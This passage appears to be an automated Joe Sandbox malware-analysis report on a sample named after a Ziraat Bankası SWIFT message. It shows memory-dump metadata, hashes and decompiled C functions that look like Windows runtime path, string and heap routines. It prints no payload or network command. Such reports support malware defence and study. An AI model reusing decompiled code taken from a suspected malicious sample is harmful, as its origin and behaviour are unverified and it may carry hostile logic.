                                                                    0x01916a70
                                                                    0x01916a77
                                                                    0x01916a7d
                                                                    0x01916a86
                                                                    0x01916a89
                                                                    0x01916a9c
                                                                    0x01916a9f
                                                                    0x01916aa2
                                                                    0x01916aa5
                                                                    0x01916aaf
                                                                    0x01916ab1
                                                                    0x01916ab8
                                                                    0x01916ab9
                                                                    0x01916abb
                                                                    0x01916abe
                                                                    0x01916ac5
                                                                    0x01916ac5
                                                                    0x01916aaf
                                                                    0x01916a40
                                                                    0x01916a26
                                                                    0x019169fe
                                                                    0x01916ace
                                                                    0x01916ad0
                                                                    0x01916ad3
                                                                    0x01916ad8
                                                                    0x01916adf
                                                                    0x01916adf
                                                                    0x01916ae8
                                                                    0x01916aef
                                                                    0x01916aef
                                                                    0x01916af9
                                                                    0x01916b06

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 45017203de26e298b719a07cb4e3bed181481c82ba98de72915451d8c8fd72ab
                                                                    • Instruction ID: c65b6d66a71e85f16e7d04194fa39475ef89ada183b8ccb3d61a1adcad955263
                                                                    • Opcode Fuzzy Hash: 45017203de26e298b719a07cb4e3bed181481c82ba98de72915451d8c8fd72ab
                                                                    • Instruction Fuzzy Hash: DB417CB1D0020DAFDB24DFA9D940BEEBBF8EF48714F14812AE918E7240DB749A45CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E01895210(intOrPtr _a4, void* _a8) {
                                                                    				void* __ecx;
                                                                    				intOrPtr _t31;
                                                                    				signed int _t32;
                                                                    				signed int _t33;
                                                                    				intOrPtr _t35;
                                                                    				signed int _t52;
                                                                    				void* _t54;
                                                                    				void* _t56;
                                                                    				unsigned int _t59;
                                                                    				signed int _t60;
                                                                    				void* _t61;
                                                                    
                                                                    				_t61 = E018952A5(1);
                                                                    				if(_t61 == 0) {
                                                                    					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                    					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                                    					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                                    				} else {
                                                                    					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                                    					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                                    				}
                                                                    				_t60 = _t59 >> 1;
                                                                    				_t32 = 0x3a;
                                                                    				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                                    					_t52 = _t60 + _t60;
                                                                    					if(_a4 > _t52) {
                                                                    						goto L5;
                                                                    					}
                                                                    					if(_t61 != 0) {
                                                                    						asm("lock xadd [esi], eax");
                                                                    						if((_t32 | 0xffffffff) == 0) {
                                                                    							_push( *((intOrPtr*)(_t61 + 4)));
                                                                    							E018D95D0();
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                    						}
                                                                    					} else {
                                                                    						E018AEB70(_t54, 0x19879a0);
                                                                    					}
                                                                    					_t26 = _t52 + 2; // 0xddeeddf0
                                                                    					return _t26;
                                                                    				} else {
                                                                    					_t52 = _t60 + _t60;
                                                                    					if(_a4 < _t52) {
                                                                    						if(_t61 != 0) {
                                                                    							asm("lock xadd [esi], eax");
                                                                    							if((_t32 | 0xffffffff) == 0) {
                                                                    								_push( *((intOrPtr*)(_t61 + 4)));
                                                                    								E018D95D0();
                                                                    								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                    							}
                                                                    						} else {
                                                                    							E018AEB70(_t54, 0x19879a0);
                                                                    						}
                                                                    						return _t52;
                                                                    					}
                                                                    					L5:
                                                                    					_t33 = E018DF3E0(_a8, _t54, _t52);
                                                                    					if(_t61 == 0) {
                                                                    						E018AEB70(_t54, 0x19879a0);
                                                                    					} else {
                                                                    						asm("lock xadd [esi], eax");
                                                                    						if((_t33 | 0xffffffff) == 0) {
                                                                    							_push( *((intOrPtr*)(_t61 + 4)));
                                                                    							E018D95D0();
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                    						}
                                                                    					}
                                                                    					_t35 = _a8;
                                                                    					if(_t60 <= 1) {
                                                                    						L9:
                                                                    						_t60 = _t60 - 1;
                                                                    						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                                    						goto L10;
                                                                    					} else {
                                                                    						_t56 = 0x3a;
                                                                    						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                                    							 *((short*)(_t52 + _t35)) = 0;
                                                                    							L10:
                                                                    							return _t60 + _t60;
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    				}
                                                                    			}














                                                                    0x01895220
                                                                    0x01895224
                                                                    0x018f0d13
                                                                    0x018f0d16
                                                                    0x018f0d19
                                                                    0x0189522a
                                                                    0x0189522a
                                                                    0x0189522d
                                                                    0x0189522d
                                                                    0x01895231
                                                                    0x01895235
                                                                    0x01895239
                                                                    0x018f0d5c
                                                                    0x018f0d62
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f0d6a
                                                                    0x018f0d7b
                                                                    0x018f0d7f
                                                                    0x018f0d81
                                                                    0x018f0d84
                                                                    0x018f0d95
                                                                    0x018f0d95
                                                                    0x018f0d6c
                                                                    0x018f0d71
                                                                    0x018f0d71
                                                                    0x018f0d9a
                                                                    0x00000000
                                                                    0x0189524a
                                                                    0x0189524a
                                                                    0x01895250
                                                                    0x018f0d24
                                                                    0x018f0d35
                                                                    0x018f0d39
                                                                    0x018f0d3b
                                                                    0x018f0d3e
                                                                    0x018f0d50
                                                                    0x018f0d50
                                                                    0x018f0d26
                                                                    0x018f0d2b
                                                                    0x018f0d2b
                                                                    0x00000000
                                                                    0x018f0d55
                                                                    0x01895256
                                                                    0x0189525b
                                                                    0x01895265
                                                                    0x018f0da7
                                                                    0x0189526b
                                                                    0x0189526e
                                                                    0x01895272
                                                                    0x018f0db1
                                                                    0x018f0db4
                                                                    0x018f0dc5
                                                                    0x018f0dc5
                                                                    0x01895272
                                                                    0x01895278
                                                                    0x0189527e
                                                                    0x0189528a
                                                                    0x0189528c
                                                                    0x0189528d
                                                                    0x00000000
                                                                    0x01895280
                                                                    0x01895282
                                                                    0x01895288
                                                                    0x0189529f
                                                                    0x01895292
                                                                    0x00000000
                                                                    0x01895292
                                                                    0x00000000
                                                                    0x01895288
                                                                    0x0189527e

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bcf6bfa5d18f0e10773c4cd8966b9b4a535bb477450df280704e8521a691c2d9
                                                                    • Instruction ID: 9a59e2d0d83e1c97853030270301ab0c9e9fd68a7bfd7f3b03d7a9ae185b8e96
                                                                    • Opcode Fuzzy Hash: bcf6bfa5d18f0e10773c4cd8966b9b4a535bb477450df280704e8521a691c2d9
                                                                    • Instruction Fuzzy Hash: 193125312417059FCB26AB5CC880F6A7766FF50764F14472EF655CB1D2DB20EB00C691
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                    				intOrPtr _v8;
                                                                    				char _v12;
                                                                    				signed short** _t33;
                                                                    				short* _t38;
                                                                    				intOrPtr* _t39;
                                                                    				intOrPtr* _t41;
                                                                    				signed short _t43;
                                                                    				intOrPtr* _t47;
                                                                    				intOrPtr* _t53;
                                                                    				signed short _t57;
                                                                    				intOrPtr _t58;
                                                                    				signed short _t60;
                                                                    				signed short* _t61;
                                                                    
                                                                    				_t47 = __ecx;
                                                                    				_t61 = __edx;
                                                                    				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                                    				if(_t60 > 0xfffe) {
                                                                    					L22:
                                                                    					return 0xc0000106;
                                                                    				}
                                                                    				if(__edx != 0) {
                                                                    					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                                    						L5:
                                                                    						E018A7B60(0, _t61, 0x18711c4);
                                                                    						_v12 =  *_t47;
                                                                    						_v12 = _v12 + 0xfff8;
                                                                    						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                                    						E018A7B60(0xfff8, _t61,  &_v12);
                                                                    						_t33 = _a8;
                                                                    						if(_t33 != 0) {
                                                                    							 *_t33 = _t61;
                                                                    						}
                                                                    						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                    						_t53 = _a12;
                                                                    						if(_t53 != 0) {
                                                                    							_t57 = _t61[2];
                                                                    							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                                    							while(_t38 >= _t57) {
                                                                    								if( *_t38 == 0x5c) {
                                                                    									_t41 = _t38 + 2;
                                                                    									if(_t41 == 0) {
                                                                    										break;
                                                                    									}
                                                                    									_t58 = 0;
                                                                    									if( *_t41 == 0) {
                                                                    										L19:
                                                                    										 *_t53 = _t58;
                                                                    										goto L7;
                                                                    									}
                                                                    									 *_t53 = _t41;
                                                                    									goto L7;
                                                                    								}
                                                                    								_t38 = _t38 - 2;
                                                                    							}
                                                                    							_t58 = 0;
                                                                    							goto L19;
                                                                    						} else {
                                                                    							L7:
                                                                    							_t39 = _a16;
                                                                    							if(_t39 != 0) {
                                                                    								 *_t39 = 0;
                                                                    								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                    								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                    								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                                    							}
                                                                    							return 0;
                                                                    						}
                                                                    					}
                                                                    					_t61 = _a4;
                                                                    					if(_t61 != 0) {
                                                                    						L3:
                                                                    						_t43 = L018B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                                    						_t61[2] = _t43;
                                                                    						if(_t43 == 0) {
                                                                    							return 0xc0000017;
                                                                    						}
                                                                    						_t61[1] = _t60;
                                                                    						 *_t61 = 0;
                                                                    						goto L5;
                                                                    					}
                                                                    					goto L22;
                                                                    				}
                                                                    				_t61 = _a4;
                                                                    				if(_t61 == 0) {
                                                                    					return 0xc000000d;
                                                                    				}
                                                                    				goto L3;
                                                                    			}
















                                                                    0x018d3d4c
                                                                    0x018d3d50
                                                                    0x018d3d55
                                                                    0x018d3d5e
                                                                    0x0190e79a
                                                                    0x00000000
                                                                    0x0190e79a
                                                                    0x018d3d68
                                                                    0x0190e789
                                                                    0x018d3d9d
                                                                    0x018d3da3
                                                                    0x018d3daf
                                                                    0x018d3db5
                                                                    0x018d3dbc
                                                                    0x018d3dc4
                                                                    0x018d3dc9
                                                                    0x018d3dce
                                                                    0x0190e7ae
                                                                    0x0190e7ae
                                                                    0x018d3dde
                                                                    0x018d3de2
                                                                    0x018d3de7
                                                                    0x018d3e0d
                                                                    0x018d3e13
                                                                    0x018d3e16
                                                                    0x018d3e1e
                                                                    0x018d3e25
                                                                    0x018d3e28
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d3e2a
                                                                    0x018d3e2f
                                                                    0x018d3e37
                                                                    0x018d3e37
                                                                    0x00000000
                                                                    0x018d3e37
                                                                    0x018d3e31
                                                                    0x00000000
                                                                    0x018d3e31
                                                                    0x018d3e20
                                                                    0x018d3e20
                                                                    0x018d3e35
                                                                    0x00000000
                                                                    0x018d3de9
                                                                    0x018d3de9
                                                                    0x018d3de9
                                                                    0x018d3dee
                                                                    0x018d3dfd
                                                                    0x018d3dff
                                                                    0x018d3e02
                                                                    0x018d3e05
                                                                    0x018d3e05
                                                                    0x00000000
                                                                    0x018d3df0
                                                                    0x018d3de7
                                                                    0x0190e78f
                                                                    0x0190e794
                                                                    0x018d3d79
                                                                    0x018d3d84
                                                                    0x018d3d89
                                                                    0x018d3d8e
                                                                    0x00000000
                                                                    0x0190e7a4
                                                                    0x018d3d96
                                                                    0x018d3d9a
                                                                    0x00000000
                                                                    0x018d3d9a
                                                                    0x00000000
                                                                    0x0190e794
                                                                    0x018d3d6e
                                                                    0x018d3d73
                                                                    0x00000000
                                                                    0x0190e7b5
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f181e894783d4278493ad76457b9cc55eacdc8d902500ea507759cd9a91efa79
                                                                    • Instruction ID: 1a5ad8e0a64b49348bdb3e005ebcbd9b9ee3045b0dbbcde64b0a1acaa30b5dc9
                                                                    • Opcode Fuzzy Hash: f181e894783d4278493ad76457b9cc55eacdc8d902500ea507759cd9a91efa79
                                                                    • Instruction Fuzzy Hash: 4031BEB1A01715DFD7258F2DC841A6ABBE5FF85700B05846AE949CB790EB30DA40CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E018CA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t35;
                                                                    				intOrPtr _t39;
                                                                    				intOrPtr _t45;
                                                                    				intOrPtr* _t51;
                                                                    				intOrPtr* _t52;
                                                                    				intOrPtr* _t55;
                                                                    				signed int _t57;
                                                                    				intOrPtr* _t59;
                                                                    				intOrPtr _t68;
                                                                    				intOrPtr* _t77;
                                                                    				void* _t79;
                                                                    				signed int _t80;
                                                                    				intOrPtr _t81;
                                                                    				char* _t82;
                                                                    				void* _t83;
                                                                    
                                                                    				_push(0x24);
                                                                    				_push(0x1970220);
                                                                    				E018ED08C(__ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                                    				_t79 = __ecx;
                                                                    				_t35 =  *0x1987b9c; // 0x0
                                                                    				_t55 = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                                    				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                                    				if(_t55 == 0) {
                                                                    					_t39 = 0xc0000017;
                                                                    					L11:
                                                                    					return E018ED0D1(_t39);
                                                                    				}
                                                                    				_t68 = 0;
                                                                    				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                                    				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                                    				_t7 = _t55 + 8; // 0x8
                                                                    				_t57 = 6;
                                                                    				memcpy(_t7, _t79, _t57 << 2);
                                                                    				_t80 = 0xfffffffe;
                                                                    				 *(_t83 - 4) = _t80;
                                                                    				if(0 < 0) {
                                                                    					L14:
                                                                    					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                    					L20:
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                                    					_t39 = _t81;
                                                                    					goto L11;
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                                    					_t81 = 0xc000007b;
                                                                    					goto L20;
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                                    					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                                    					_t45 =  *_t59;
                                                                    					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                                    					 *_t59 = _t45 + 1;
                                                                    					L6:
                                                                    					 *(_t83 - 4) = 1;
                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                                    					 *(_t83 - 4) = _t80;
                                                                    					if(_t68 < 0) {
                                                                    						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                                    						if(_t82 == 0) {
                                                                    							goto L14;
                                                                    						}
                                                                    						asm("btr eax, ecx");
                                                                    						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                    						if( *_t82 != 0) {
                                                                    							 *0x1987b10 =  *0x1987b10 - 8;
                                                                    						}
                                                                    						goto L20;
                                                                    					}
                                                                    					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                                    					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                                    					_t51 =  *0x198536c; // 0x77de5368
                                                                    					if( *_t51 != 0x1985368) {
                                                                    						_push(3);
                                                                    						asm("int 0x29");
                                                                    						goto L14;
                                                                    					}
                                                                    					 *_t55 = 0x1985368;
                                                                    					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                                    					 *_t51 = _t55;
                                                                    					 *0x198536c = _t55;
                                                                    					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                                    					if(_t52 != 0) {
                                                                    						 *_t52 = _t55;
                                                                    					}
                                                                    					_t39 = 0;
                                                                    					goto L11;
                                                                    				}
                                                                    				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                                    				_t68 = E018CA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                                    				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                                    				if(_t68 < 0) {
                                                                    					goto L14;
                                                                    				}
                                                                    				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                                    				goto L6;
                                                                    			}


















                                                                    0x018ca61c
                                                                    0x018ca61e
                                                                    0x018ca623
                                                                    0x018ca628
                                                                    0x018ca62b
                                                                    0x018ca62d
                                                                    0x018ca648
                                                                    0x018ca64a
                                                                    0x018ca64f
                                                                    0x01909b44
                                                                    0x018ca6ec
                                                                    0x018ca6f1
                                                                    0x018ca6f1
                                                                    0x018ca655
                                                                    0x018ca657
                                                                    0x018ca65a
                                                                    0x018ca65d
                                                                    0x018ca662
                                                                    0x018ca663
                                                                    0x018ca667
                                                                    0x018ca668
                                                                    0x018ca66d
                                                                    0x018ca706
                                                                    0x018ca706
                                                                    0x01909bda
                                                                    0x01909be6
                                                                    0x01909beb
                                                                    0x00000000
                                                                    0x01909beb
                                                                    0x018ca679
                                                                    0x01909b7a
                                                                    0x00000000
                                                                    0x01909b7a
                                                                    0x018ca683
                                                                    0x018ca6f4
                                                                    0x018ca6f7
                                                                    0x018ca6f9
                                                                    0x018ca6fd
                                                                    0x018ca6a0
                                                                    0x018ca6a0
                                                                    0x018ca6ad
                                                                    0x018ca6af
                                                                    0x018ca6b4
                                                                    0x01909ba7
                                                                    0x01909bac
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01909bc6
                                                                    0x01909bce
                                                                    0x01909bd1
                                                                    0x01909bd3
                                                                    0x01909bd3
                                                                    0x00000000
                                                                    0x01909bd1
                                                                    0x018ca6bd
                                                                    0x018ca6c3
                                                                    0x018ca6c6
                                                                    0x018ca6d2
                                                                    0x018ca701
                                                                    0x018ca704
                                                                    0x00000000
                                                                    0x018ca704
                                                                    0x018ca6d4
                                                                    0x018ca6d6
                                                                    0x018ca6d9
                                                                    0x018ca6db
                                                                    0x018ca6e1
                                                                    0x018ca6e6
                                                                    0x018ca6e8
                                                                    0x018ca6e8
                                                                    0x018ca6ea
                                                                    0x00000000
                                                                    0x018ca6ea
                                                                    0x018ca688
                                                                    0x018ca692
                                                                    0x018ca694
                                                                    0x018ca699
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ca69d
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ddf36aeaad330d64911240b1c484e26bc4d7122535d126efaffa6bee704ad635
                                                                    • Instruction ID: 1ce5f63a1d1c47ebac958a231edf147a371ccad84fe0ddc5b0c518c738aa7680
                                                                    • Opcode Fuzzy Hash: ddf36aeaad330d64911240b1c484e26bc4d7122535d126efaffa6bee704ad635
                                                                    • Instruction Fuzzy Hash: 6E416A75A00209DFDB19CF58C880BADBBF1BB89714F19806DE909EB385E774EA01CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			E018BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                    				signed int* _v8;
                                                                    				char _v16;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				signed char _t33;
                                                                    				signed char _t43;
                                                                    				signed char _t48;
                                                                    				signed char _t62;
                                                                    				void* _t63;
                                                                    				intOrPtr _t69;
                                                                    				intOrPtr _t71;
                                                                    				unsigned int* _t82;
                                                                    				void* _t83;
                                                                    
                                                                    				_t80 = __ecx;
                                                                    				_t82 = __edx;
                                                                    				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                    				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                    				if((_t33 & 0x00000001) != 0) {
                                                                    					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                    					if(E018B7D50() != 0) {
                                                                    						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    					} else {
                                                                    						_t43 = 0x7ffe0386;
                                                                    					}
                                                                    					if( *_t43 != 0) {
                                                                    						_t43 = E01968D34(_v8, _t80);
                                                                    					}
                                                                    					E018B2280(_t43, _t82);
                                                                    					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                    						E018AFFB0(_t62, _t80, _t82);
                                                                    						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                    						_t30 = _t80 + 0xd0; // 0xd0
                                                                    						_t83 = _t30;
                                                                    						E01968833(_t83,  &_v16);
                                                                    						_t81 = _t80 + 0x90;
                                                                    						E018AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                    						_t63 = 0;
                                                                    						_push(0);
                                                                    						_push(_t83);
                                                                    						_t48 = E018DB180();
                                                                    						if(_a4 != 0) {
                                                                    							E018B2280(_t48, _t81);
                                                                    						}
                                                                    					} else {
                                                                    						_t69 = _v8;
                                                                    						_t12 = _t80 + 0x98; // 0x98
                                                                    						_t13 = _t69 + 0xc; // 0x575651ff
                                                                    						E018BBB2D(_t13, _t12);
                                                                    						_t71 = _v8;
                                                                    						_t15 = _t80 + 0xb0; // 0xb0
                                                                    						_t16 = _t71 + 8; // 0x8b000cc2
                                                                    						E018BBB2D(_t16, _t15);
                                                                    						E018BB944(_v8, _t62);
                                                                    						 *((char*)(_t80 + 0xdc)) = 0;
                                                                    						E018AFFB0(0, _t80, _t82);
                                                                    						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                    						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                    						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                    						 *(_t80 + 0xde) = 0;
                                                                    						if(_a4 == 0) {
                                                                    							_t25 = _t80 + 0x90; // 0x90
                                                                    							E018AFFB0(0, _t80, _t25);
                                                                    						}
                                                                    						_t63 = 1;
                                                                    					}
                                                                    					return _t63;
                                                                    				}
                                                                    				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                    				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                    				if(_a4 == 0) {
                                                                    					_t24 = _t80 + 0x90; // 0x90
                                                                    					E018AFFB0(0, __ecx, _t24);
                                                                    				}
                                                                    				return 0;
                                                                    			}
















                                                                    0x018bc18d
                                                                    0x018bc18f
                                                                    0x018bc191
                                                                    0x018bc19b
                                                                    0x018bc1a0
                                                                    0x018bc1d4
                                                                    0x018bc1de
                                                                    0x01902d6e
                                                                    0x018bc1e4
                                                                    0x018bc1e4
                                                                    0x018bc1e4
                                                                    0x018bc1ec
                                                                    0x01902d7d
                                                                    0x01902d7d
                                                                    0x018bc1f3
                                                                    0x018bc1ff
                                                                    0x01902d88
                                                                    0x01902d8d
                                                                    0x01902d94
                                                                    0x01902d94
                                                                    0x01902d9f
                                                                    0x01902da4
                                                                    0x01902dab
                                                                    0x01902db0
                                                                    0x01902db2
                                                                    0x01902db3
                                                                    0x01902db4
                                                                    0x01902dbc
                                                                    0x01902dc3
                                                                    0x01902dc3
                                                                    0x018bc205
                                                                    0x018bc205
                                                                    0x018bc208
                                                                    0x018bc20e
                                                                    0x018bc211
                                                                    0x018bc216
                                                                    0x018bc219
                                                                    0x018bc21f
                                                                    0x018bc222
                                                                    0x018bc22c
                                                                    0x018bc234
                                                                    0x018bc23a
                                                                    0x018bc23f
                                                                    0x018bc245
                                                                    0x018bc24b
                                                                    0x018bc251
                                                                    0x018bc25a
                                                                    0x018bc276
                                                                    0x018bc27d
                                                                    0x018bc27d
                                                                    0x018bc25c
                                                                    0x018bc25c
                                                                    0x00000000
                                                                    0x018bc25e
                                                                    0x018bc1a4
                                                                    0x018bc1aa
                                                                    0x018bc1b3
                                                                    0x018bc265
                                                                    0x018bc26c
                                                                    0x018bc26c
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                    • Instruction ID: 6854f0150772eba7ada9348da0e5cbe53bdefbce97b84d011e816fe8381eaaca
                                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                    • Instruction Fuzzy Hash: 2A31C072601A4BAEE705EBB8C480BE9FB58BF52304F04815AD51CD7341DB346B49C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E01917016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                    				signed int _v8;
                                                                    				char _v588;
                                                                    				intOrPtr _v592;
                                                                    				intOrPtr _v596;
                                                                    				signed short* _v600;
                                                                    				char _v604;
                                                                    				short _v606;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed short* _t55;
                                                                    				void* _t56;
                                                                    				signed short* _t58;
                                                                    				signed char* _t61;
                                                                    				char* _t68;
                                                                    				void* _t69;
                                                                    				void* _t71;
                                                                    				void* _t72;
                                                                    				signed int _t75;
                                                                    
                                                                    				_t64 = __edx;
                                                                    				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                    				_v8 =  *0x198d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                    				_t55 = _a16;
                                                                    				_v606 = __ecx;
                                                                    				_t71 = 0;
                                                                    				_t58 = _a12;
                                                                    				_v596 = __edx;
                                                                    				_v600 = _t58;
                                                                    				_t68 =  &_v588;
                                                                    				if(_t58 != 0) {
                                                                    					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                    					if(_t55 != 0) {
                                                                    						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                    					}
                                                                    				}
                                                                    				_t8 = _t71 + 0x2a; // 0x28
                                                                    				_t33 = _t8;
                                                                    				_v592 = _t8;
                                                                    				if(_t71 <= 0x214) {
                                                                    					L6:
                                                                    					 *((short*)(_t68 + 6)) = _v606;
                                                                    					if(_t64 != 0xffffffff) {
                                                                    						asm("cdq");
                                                                    						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                    						 *((char*)(_t68 + 0x28)) = _a4;
